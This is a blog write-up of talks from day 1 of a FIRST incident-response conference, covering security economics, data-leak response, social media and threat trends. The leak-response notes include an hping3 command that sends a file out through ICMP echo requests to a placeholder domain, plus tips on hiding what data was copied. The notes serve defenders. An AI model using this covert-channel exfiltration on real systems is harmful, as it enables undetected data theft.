Well I’m finally over my jet-lag, ok, almost over my jet-lag, and day 1 of the 21st FIRST conference is just about complete. I managed to hit a few interesting talks today. Not all of them were public information, but I’ve written up some notes from the ones that were for your enjoyment. Short note, this isn’t a high-tech conference like Blackhat, so if you think the information is a little high-level, then you’ll understand why. The focus of the conference is more in Incident Response and Handling, than my usual attack vectors stuff, but so far it’s been a great experience. Hope you enjoy the write-up.
09:00 Information Security Management and Economic Crisis – Suguru Yamaguchi
I know that keynotes are usually meant to be dry and a little bit boring (sorry, but you can’t sugar coat the truth), however I decided to risk it and pop in to see what was on offer. It seems that nobody told Mr Yamaguchi that he was meant to be boring, which made for a bit of a surprise. After a quick guide to what to see in Kyoto (along with shopping tips) and some historical information about Japan (any why the food was much better here in Kyoto than in Tokyo) the talk moved into the more serious side of risk management in the current economic climate. The topics covered were varied, so stay with me if it seems a little chaotic.
Economic Crisis / time of “less”
The initial focus was on the use of technology in Japan to automate and streamline services such as speed/control systems used in the Japanese bullet trains, management of the Tokyo underground network, RFID for stock tracking/distribution management (to automate shipping of stock to locations depending on demand) and water control/flow management. The use of technology is also now working it’s way into smaller businesses such as taxi services (using TCP/IP connected terminals in the cabs to transmit requests and improve management of services). IT is now a vital component of all businesses, not just large multi-nationals, but also the smaller businesses are becoming more reliant on these systems for everyday business purposes.
“perimeter protection model” doesn’t work anymore
With the increase in outsourcing, ASP, SaaS and cloud computing the perimeter is much more fluid and undefined. Services are now from entities in other countries. Different rules, laws and standards.
Risks have changed dramatically
- Quality and Quantity of “attacks”
- Economic damages
- Who is attacking / being attacked
“Public Private Partnership” –> Government policy to encourage knowledge sharing across business domains (especially critical infrastructure)
Main goals set in 2006 (in Japan), new goals to be reviewed in 2009 .:
- More preparedness
- More scientific approach
- Share risk between business and government
The economic crisis have caused costs to be cut in various ways. Less investment in information systems (including information security management). Slow down of innovations, upgrades and improvements. As the headcount lowers, companies are unable to innovate and adapt as easily as before.
Mission impossible for system operators. Lower budgets, less staff and increase in security incidents (rise in data loss/theft issues). Cost savings and security assistance can be achieved through the use of virtualization and BYO (Bring Your Own) laptop schemes. BYO – Using personal laptops for business uses. Based on virtualization or thin-client solutions. Reduces costs and can help improve security.
Real-time 3D visualization by Nicter (Network Incident analysis Center for Tactical Emergency Response)
Use of visualization in comparing attack traffic to normal traffic. By using this technique it is easy to see portscans, DoS attempts and a variety of other attack types visually and in real-time. Helps to streamline information management in a time when less needs to do more.
Invisible computers a growing risk. Electronics that are not traditional computers, but operate on the TCP/IP networks (HD-Recorders, Set-Top boxes, etc….) These systems are more vulnerable and open to abuse. Attacks routed through these devices have started to be seen in the wild in Japan.
13:30 Proprietary data leaks: Response and Recovery – Sherri Davidoff / Johnathon Ham
Scenario: Attacker has physical access
Attacker Profile: Staff member, cleaning staff, security guards, etc…
Spybase Wireless Keylogger ($285 Amazon)
- Install once and access through wireless to download the data
- Staff are unaware/untrained on what to check for on a system to check for a keylogger
Questions to ask in a response scenario
- How long has the keylogger been installed ?
- Who planted it ?
- What information has been exposed ?
- What other systems could be exposed ?
Keyloggers have serial numbers, many manufacturers will provide information on sales to law enforcement in the event of an incident. Track other systems that have had the same device installed. Often the attacker has tested it on his/her own machine first. If this is an internal staff member, then this may be a source of information.
USB devices come in many different formats. Pens, wristbands, iPods, Sushi (yes as seen in Johnny Long’s presentation), and many different places to hide things like micro-SD. Ironkey have a professional USB that supports remote wipe. If you recover this kind of USB in an incident response, store in a suitable bag to block incoming wipe commands.
Sherri performed a live demo that demonstrated how easy it is to download data from a system to a phone connected through USB. By using encryption and deleting the key after encryption it is possible to prevent a responder identifying what data was copied.
In physical access cases .:
- Monitor account/system usage
- Preserve evidence / chain of custody
- Determine type of affected data
- Contact legal advisers
- Lockout / monitor (depending on situation)
- Identify systems that could also be exposed
Scenario: Attacker Logical Access
Use of convert channels to ex-filtrate the data without triggering defenses
Examples of covert channels :
- ICMP Echo Request Tunneling (Loki)
- Implemented using HPING3 -E secret.xls -1 -u -d 1024 nonexistent.domain.com
- Capture using TCPDUMP
Hard to track where the data is going (ICMP to a nonexistent domain). Attacker must be somewhere in the line to capture the data using TCPDUMP. Open in Wireshark and then carve out the file.
How to protect against this ?
- Track the data export at the database
- Log commands run on servers / applications installed on servers
- Should this server be sending Echo Requests ? Block and Log
- Watch for proprietary data on the wire (in cleartext)
- Using RegEx to detect set data
- Implement using something like SNORT
Use Honeytokens to trigger alerts. Insert dummy records into the database (that should never be returned unless the whole table is dumped), files with seemingly interesting data (passwords.xls) which are present in a non-browsable area of your website. Insert code-comments into the source-code of your internally developed applications and create rules to alert/block traffic leaving your network with these comments.
Doesn’t prevent exposure, doesn’t provide the depth of the issue, however the first piece of the puzzle is being aware that something bad is happening.
Issues: Encryption of the data will prevent this honeytoken being tracked.
Solution: Frequency analysis – Detect the frequency of hex values to discover if the data is encrypted. Search and alert on encrypted data where it is not part of the normal traffic pattern. Entropy-based anomaly detection detection through the SNORT platform. No plugin yet for this purpose. Stay tuned…
Last point of recovery process needs to be an improved preventative posture. Lessons learned.
What we’ve learned :
- Think like an evil insider
- Log everything possible to improve the scoping of the breach
14:30 Using Social Media in Incident Response – Martin McKeay
Staff / Responders that use social media are releasing information live as it comes in. Due to the fact this is a live response, it can often be more about emotion than about fact. Company policy for electronic media (including social media) isn’t set in a majority of companies. Those that do have a policy do not always enforce the policy, or make staff aware of their responsibilities.
Companies are slow to come to social networking and are seeing issue when they look to claim their company name or trademark. Who is currently using your company name on Twitter, Facebook, MySpace, etc… ? Incidents of non-staff taking the name of companies and using it to communicate as if they are the company. There are also cases of unauthorized staff using the company name within social networking sites or blogs. Readers of official company blogs and social media services are unforgiving when it comes to pure marketing and sales messages. In order to be a useful communication tool for handling and communicating incidents, you have to build followers and readers prior to having an incident. This takes more than just posting up marketing information and expecting people to listen.
Company policy should dictate what happens when an incident occurs. If you suddenly stop twittering/blogging then people will notice and think the worst. News travels fast on social networks, and unless you supply the news, this information can come from any source and be based on pure speculation. AT&T outage can be used as a good example. In the case of AT&T, many users one Twitter where mapping out the areas suffering a connection outage although AT&T didn’t talk about the issue openly. This has caused damaged to AT&T’s reputation.
Key points .:
- Assign person who will communicate
- Policy on what to communicate
- Who is dealing with Blogesphere / Social Media
16:30 Emerging Threats and Attack Trends – Paul Oxman
Threats are moving up the stack towards targeting individuals.
Designer malcode is now being developed using bleeding edge software development techniques and protections. As with other software maturity models, malware has also begun to adopt the same processes. Backup Malcode is being made available to customers in order to replace the original once AV vendors catchup and start detecting the attack code.
Large-scale worms are getting rarer as attacks become more targeted and selective. As the large-scale attacks drop, the cybercrime profits have increased. Email as an attack vector is also slowing as web based vectors increase in popularity. Blended attacks are becoming more prevalent.
Cyber-terrorism – Future conflicts are much more likely to have a cyber element to them.
- 70% of the top 100 websites pointed to (or contained) malware
- Number of vulnerabilities up 11% from 2007
- Reputation HiJacking on the increase
- Attacks are more targeted to help maximize effectiveness
- More reliance on blended threats
Issues of hardware being infected at “source” to catch consumers off guard. A user is more likely to accept an install request when you plugin a new device (i.e. digital photo-frame).
Attackers are taking information gathered from phishing attacks and using it on various popular services to catch users who are relying on a limited set (or even just one) password for multiple services/sites.
July 2008 – 45% of browsers still vulnerable despite auto-update features.
Malware targeting current events (Olympics was a prime target for attack). The fake Olympics website netted 40-50 Million USD, and gathered username/passwords for further attacks on websites.
Known vulnerabilities are left unpatched. Attackers don’t have to come up with 0-day attacks if they can exploit know issues.
Case study of how the creators of conficker evolved their attack by updating from MD5 to MD6 and then patching a flaw in MD6 when it was found to be vulnerable. 85% of code was replaced from 1 version to another. Not your average malware.
Threats on the horizon:
- SMS vishing
- Extensive social engineering
- More highly targeted attacks
- Attacks on mobile devices (different OS an issue for attackers)
- Using video sharing sites as a method for distribution of malware
Incident response. The most important factors are preparation for the (inevitable) attack/incident, and the post-mortem to learn from your response (often forgotten or skipped).
Well that’s all from day 1. No sushi yet, but the night is young. More to follow after day 2 😉